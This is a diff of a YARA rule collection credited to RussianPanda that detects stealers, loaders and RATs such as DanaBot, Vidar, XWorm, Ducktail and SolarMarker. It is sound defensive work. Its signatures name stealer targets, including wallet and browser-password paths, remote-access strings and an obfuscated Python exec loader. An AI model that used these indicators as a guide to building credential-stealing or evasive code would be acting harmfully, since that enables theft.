-		description = "Detects WhiteSnake Stealer XOR samples "
+		description = "Detects Base64 Encoding and Decoding patterns in Golang binaries"
 		author = "RussianPanda"
-		id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651"
-		date = "2023-07-04"
-		modified = "2023-12-11"
-		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15"
+		id = "6330e005-9c67-5acd-9063-aa7e30e92f5f"
+		date = "2024-01-10"
+		modified = "2024-01-14"
+		reference = "https://unprotect.it/technique/base64/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/golang_base64_enc.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819"
+		hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c"
+		logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd"
 		score = 75
 		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
-		$s2 = {61 6e 61 6c 2e 6a 70 67}
+		$s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}
+		$s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}
+		$s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}
+		$s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
 
 	condition:
-		all of ( $s* ) and filesize < 600KB
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D
 }
-rule RUSSIANPANDA_PSWSTEALER : FILE
+rule RUSSIANPANDA_Check_Installed_Software : FILE
 {
 	meta:
-		description = "PSWSTEALER"
+		description = "No description has been set in the source file - RussianPanda"
 		author = "RussianPanda"
-		id = "8a596074-ffe3-5979-b384-487ebe8b953c"
-		date = "2023-04-02"
-		modified = "2023-05-05"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PSWSTEALER/pswstealer.yar#L1-L14"
+		id = "a45c7012-dc83-59da-a691-251f0a06be12"
+		date = "2024-01-14"
+		modified = "2024-01-15"
+		reference = "https://unprotect.it/technique/checking-installed-software/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/check_installed_software.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1"
-		score = 75
-		quality = 85
+		hash = "db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07"
+		logic_hash = "ab079f1edaffca5bce1e872d6e4fc44f7c22b9260feaed7cd38e578646d420ef"
+		score = 45
+		quality = 35
 		tags = "FILE"
 
 	strings:
-		$obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D}
-		$obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C}
-		$enc = {73 ?? 00 00 0A 73 ?? 00 00 0A}
-		$s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A}
+		$d1 = "DisplayVersion"
+		$u1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
+		$reg = "RegOpenKeyExA"
+		$h = {68 (01|02) 00 00 80}
 
 	condition:
-		all of them and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and $reg and $h and for any i in ( 1 .. #u1 ) : ( $d1 in ( @u1 [ i ] - 200 .. @u1 [ i ] + 200 ) )
 }
 rule RUSSIANPANDA_Legionloader : FILE
 {
@@ -159885,31 +160607,83 @@ rule RUSSIANPANDA_Legionloader_Dropper : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them and filesize < 1MB
 }
-rule RUSSIANPANDA_Jinxloader : FILE
+rule RUSSIANPANDA_Danabot
 {
 	meta:
-		description = "Detects JinxLoader Golang version"
+		description = "Detects DanaBot"
 		author = "RussianPanda"
-		id = "25570c99-5938-5be0-a153-a07be0d0571c"
-		date = "2024-01-02"
-		modified = "2024-01-02"
+		id = "804604d9-db3b-5678-ae0d-67f0e876c93e"
+		date = "2023-12-01"
+		modified = "2023-12-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/DanaBot/danabot_yara.yar#L1-L17"
 		license_url = "N/A"
-		hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71"
-		logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1"
+		logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684"
 		score = 75
-		quality = 81
+		quality = 83
+		tags = ""
+
+	strings:
+		$s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00}
+		$s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79}
+		$s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00}
+		$s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
+		$s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
+		$a = {44 45 4C 50 48 49 43 4C 41 53 53}
+
+	condition:
+		3 of ( $s* ) and $a
+}
+rule RUSSIANPANDA_Mal_Cleanuploader : FILE
+{
+	meta:
+		description = "Detects CleanUpLoader"
+		author = "RussianPanda"
+		id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31"
+		date = "2024-02-14"
+		modified = "2024-02-14"
+		reference = "https://x.com/AnFam17/status/1757871703282077857?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/CleanUpLoader/mal_cleanuploader.yar#L1-L14"
+		license_url = "N/A"
+		hash = "2b62dd154b431d8309002d5b4a35de07"
+		logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a"
+		score = 75
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63}
-		$s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00}
-		$s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74}
-		$s4 = {48 8D 1D B7 24 08 00 [25] E8 EF FC E4 FF}
+		$s1 = {0F B6 80 30 82 42 00 88}
+		$s2 = {44 69 73 6B 43 6C 72}
+		$s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* ) and filesize < 9MB
+		uint16( 0 ) == 0x5A4D and all of them and #s1 > 15
+}
+rule RUSSIANPANDA_Garystealer : FILE
+{
+	meta:
+		description = "Detects GaryStealer 1-3-2024"
+		author = "RussianPanda"
+		id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab"
+		date = "2024-01-03"
+		modified = "2024-01-03"
+		reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GaryStealer/garystealer-1-3-2024.yar#L1-L20"
+		license_url = "N/A"
+		hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435"
+		logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15"
+		score = 75
+		quality = 79
+		tags = "FILE"
+
+	strings:
+		$s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63}
+		$s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d}
+		$s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64}
+		$s4 = {C7 40 28 ?? 00 00 00}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) and filesize < 20MB and #s4 > 2
 }
 
 rule RUSSIANPANDA_Bandit_Stealer : FILE
@@ -159935,53 +160709,81 @@ rule RUSSIANPANDA_Bandit_Stealer : FILE
 	condition:
 		all of ( $s* ) and ( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x4464c457f ) and pe.sections [ 0 ] . name contains "UPX0" and pe.sections [ 1 ] . name contains "UPX1" and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_WRITE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_WRITE
 }
-rule RUSSIANPANDA_AMOS_Stealer : FILE
+rule RUSSIANPANDA_PSWSTEALER : FILE
 {
 	meta:
-		description = "Detects AMOS Stealer"
+		description = "PSWSTEALER"
 		author = "RussianPanda"
-		id = "f2abe03e-7a29-514d-9125-9ec9d0875179"
-		date = "2025-03-31"
-		modified = "2025-04-11"
+		id = "8a596074-ffe3-5979-b384-487ebe8b953c"
+		date = "2023-04-02"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AMOS/amos_stealer.yar#L1-L24"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PSWSTEALER/pswstealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
-		logic_hash = "64bf0753e2696633ed255df9350a01cb1e75fd6e6c0d4fe48194927acf7e2363"
+		logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = {E8 ?? ?? ?? ?? E9 00 00 00 00 48 8D}
-		$op2 = {48 3B 85 68 FF FF FF 0F 83 03 01 00 00 C6 85 5F FF FF FF 00 C7 85 58 FF FF FF 00 00 00 00}
+		$obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D}
+		$obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C}
+		$enc = {73 ?? 00 00 0A 73 ?? 00 00 0A}
+		$s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A}
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 5000 and $op2 )
+		all of them and filesize < 200KB
 }
-rule RUSSIANPANDA_AMOS_Stealer_1 : FILE
+
+rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE
 {
 	meta:
-		description = "Detects AMOS Stealer"
+		description = "Detects Ducktail myRdpService bot"
 		author = "RussianPanda"
-		id = "481c0abc-efa6-5965-a5b8-0164229130e1"
-		date = "2025-04-11"
-		modified = "2025-04-11"
+		id = "50786786-a7db-5290-a363-6fda139a0343"
+		date = "2023-12-24"
+		modified = "2023-12-26"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AMOS/amos_stealer_4_25.yar#L1-L24"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17"
 		license_url = "N/A"
-		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
-		logic_hash = "dffaf67bdfb8db07f69fb00720a6638e7a89db2acc1d848d635031a0aec5bdd3"
+		logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = {E8 ?? ?? ?? ?? EB 00 48 8D}
-		$op2 = {48 8D BD ?? ?? FF FF E8 ?? ?? 00 00 48 8D BD}
+		$s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74}
+		$s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A}
+		$s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00}
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 50000 and #op2 > 4 )
+		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
+}
+
+rule RUSSIANPANDA_Ducktail_Mainbot : FILE
+{
+	meta:
+		description = "Detects Ducktail mainbot"
+		author = "RussianPanda"
+		id = "f280903f-13d3-54e1-8308-781e3f777d13"
+		date = "2023-12-24"
+		modified = "2023-12-26"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19"
+		license_url = "N/A"
+		logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B}
+		$s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74}
+		$s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73}
+		$s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67}
+
+	condition:
+		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
 }
 rule RUSSIANPANDA_Ducktail : FILE
 {
@@ -160010,354 +160812,316 @@ rule RUSSIANPANDA_Ducktail : FILE
 	condition:
 		all of them and filesize > 60MB
 }
-
-rule RUSSIANPANDA_Ducktail_Mainbot : FILE
+rule RUSSIANPANDA_Win_Mal_Xworm : FILE
 {
 	meta:
-		description = "Detects Ducktail mainbot"
+		description = "Detects XWorm RAT"
 		author = "RussianPanda"
-		id = "f280903f-13d3-54e1-8308-781e3f777d13"
-		date = "2023-12-24"
-		modified = "2023-12-26"
+		id = "5701f382-3c97-5a00-9673-6c39b0f11cc2"
+		date = "2024-03-11"
+		modified = "2024-03-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/XWorm/win_mal_XWorm.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4"
+		hash = "fc422800144383ef6e2e0eee37e7d6ba"
+		logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B}
-		$s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74}
-		$s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73}
-		$s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67}
+		$s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
+		$s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21}
+		$s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E}
+		$s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
+		$s5 = "_CorExeMain"
 
 	condition:
-		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE
+rule RUSSIANPANDA_Vidar_DLL_Embedded
 {
 	meta:
-		description = "Detects Ducktail myRdpService bot"
+		description = "Vidar Stealer with embedded DLL dependencies"
 		author = "RussianPanda"
-		id = "50786786-a7db-5290-a363-6fda139a0343"
-		date = "2023-12-24"
-		modified = "2023-12-26"
+		id = "462fe42a-2504-5e7e-ad90-2c7e54478204"
+		date = "2023-05-02"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b"
+		logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74}
-		$s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A}
-		$s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00}
+		$s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05}
+		$a1 = "https://t.me/mastersbots"
+		$a2 = "https://steamcommunity.com/profiles/76561199501059503"
+		$a3 = "%s\\%s\\Local Storage\\leveldb"
+		$a4 = "\\Autofill\\%s_%s.txt"
+		$a5 = "\\Downloads\\%s_%s.txt"
+		$a6 = "\\CC\\%s_%s.txt"
+		$a7 = "Exodus\\exodus.wallet"
 
 	condition:
-		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
+		$s and 5 of ( $a* )
 }
-rule RUSSIANPANDA_Mal_Cleanuploader : FILE
+rule RUSSIANPANDA_Mal_Narniarat : FILE
 {
 	meta:
-		description = "Detects CleanUpLoader"
+		description = "Detects NarniaRAT from BotnetFenix campaign"
 		author = "RussianPanda"
-		id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31"
-		date = "2024-02-14"
-		modified = "2024-02-14"
-		reference = "https://x.com/AnFam17/status/1757871703282077857?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/CleanUpLoader/mal_cleanuploader.yar#L1-L14"
+		id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c"
+		date = "2024-02-02"
+		modified = "2024-02-02"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/NarniaRAT/mal_NarniaRAT.yar#L1-L16"
 		license_url = "N/A"
-		hash = "2b62dd154b431d8309002d5b4a35de07"
-		logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a"
+		hash = "43f6c3f92a025d12de4c4f14afa5d098"
+		logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {0F B6 80 30 82 42 00 88}
-		$s2 = {44 69 73 6B 43 6C 72}
-		$s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65}
+		$s1 = "client-remote desktop"
+		$s2 = "SendDataToServer"
+		$s3 = "SendRunningApps"
+		$s4 = "SendDataToServer"
+		$s5 = "SendKeys"
+		$s6 = "_CorExeMain"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s1 > 15
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule RUSSIANPANDA_Check_Installed_Software : FILE
+rule RUSSIANPANDA_Sentinel_Stealer
 {
 	meta:
-		description = "No description has been set in the source file - RussianPanda"
+		description = "Detects Sentinel Stealer"
 		author = "RussianPanda"
-		id = "a45c7012-dc83-59da-a691-251f0a06be12"
-		date = "2024-01-14"
-		modified = "2024-01-15"
-		reference = "https://unprotect.it/technique/checking-installed-software/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/check_installed_software.yar#L1-L19"
+		id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186"
+		date = "2024-01-19"
+		modified = "2024-01-19"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SentinelStealer/sentinel_stealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07"
-		logic_hash = "ab079f1edaffca5bce1e872d6e4fc44f7c22b9260feaed7cd38e578646d420ef"
-		score = 45
-		quality = 35
-		tags = "FILE"
+		hash = "3a540a8a81c5a5b452f154d7875423a3"
+		logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$d1 = "DisplayVersion"
-		$u1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
-		$reg = "RegOpenKeyExA"
-		$h = {68 (01|02) 00 00 80}
+		$s1 = "Sentinel.SmallerEncryptedIcon" wide
+		$s2 = "SentinelSteals" wide
+		$s4 = "_CorExeMain"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $reg and $h and for any i in ( 1 .. #u1 ) : ( $d1 in ( @u1 [ i ] - 200 .. @u1 [ i ] + 200 ) )
+		all of them
 }
-rule RUSSIANPANDA_Golang_Base64_Enc : FILE
+rule RUSSIANPANDA_Solarphantom : FILE
 {
 	meta:
-		description = "Detects Base64 Encoding and Decoding patterns in Golang binaries"
+		description = "SolarPhantom Backdoor Detection"
 		author = "RussianPanda"
-		id = "6330e005-9c67-5acd-9063-aa7e30e92f5f"
-		date = "2024-01-10"
-		modified = "2024-01-14"
-		reference = "https://unprotect.it/technique/base64/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/golang_base64_enc.yar#L1-L18"
+		id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8"
+		date = "2023-12-11"
+		modified = "2023-12-11"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarphantom.yar#L1-L16"
 		license_url = "N/A"
-		hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c"
-		logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd"
+		logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7"
 		score = 75
 		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}
-		$s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}
-		$s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}
-		$s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+		$p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8}
+		$p2 = {68 E8 EF 46 00 FF 75 E4}
+		$p3 = {62 72 76 70 72 66 5f 62 6b 70}
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D
+		uint16( 0 ) == 0x5A4D and 1 of ( $p* ) and filesize < 600KB
 }
-rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE
+rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE
 {
 	meta:
-		description = "Detects Obfuscated Code Using Python Marshal Module"
+		description = "Detects SolarMarker First Stage payload"
 		author = "RussianPanda"
-		id = "23ed45f6-69ba-5027-ad68-4be858fc1f91"
-		date = "2024-01-16"
-		modified = "2024-01-16"
-		reference = "https://www.trendmicro.com/fr_fr/research/23/j/infection-techniques-across-supply-chains-and-codebases.html"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/susp_obf_py_marshal_module.yar#L1-L18"
+		id = "56eec644-9ad7-51db-9d11-68ea3e12c36a"
+		date = "2024-01-30"
+		modified = "2024-01-30"
+		reference = "https://x.com/luke92881/status/1751968350689771966?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21"
 		license_url = "N/A"
-		hash = "d740129ff6bdb65a324eadf4ac8de3893a54306cf2a11712a305ef6247204092"
-		logic_hash = "f150fae6d7a4642f714f4620dab65f452e5eb9cb57e9cbea46010aac3ecbb3cb"
-		score = 65
-		quality = 60
+		hash = "f53563541293a826738d3b8f1164ea43"
+		logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee"
+		score = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "exec(marshal.loads(zlib.decompress(b'x\\x9c"
-		$t2 = "gzip"
-		$t3 = "lzma"
-		$t4 = "bz2"
-		$t5 = "binascii"
-
-	condition:
-		$s1 and any of ( $t* ) and filesize < 2MB
-}
-rule RUSSIANPANDA_Win_Sus_Internetshortcutfile
-{
-	meta:
-		description = "Detects suspicious Internet Shortcut Files that are often used to retrieve malware"
-		author = "RussianPanda"
-		id = "88d5d33f-0342-5575-b5e4-31ac5695abf2"
-		date = "2024-02-17"
-		modified = "2024-02-17"
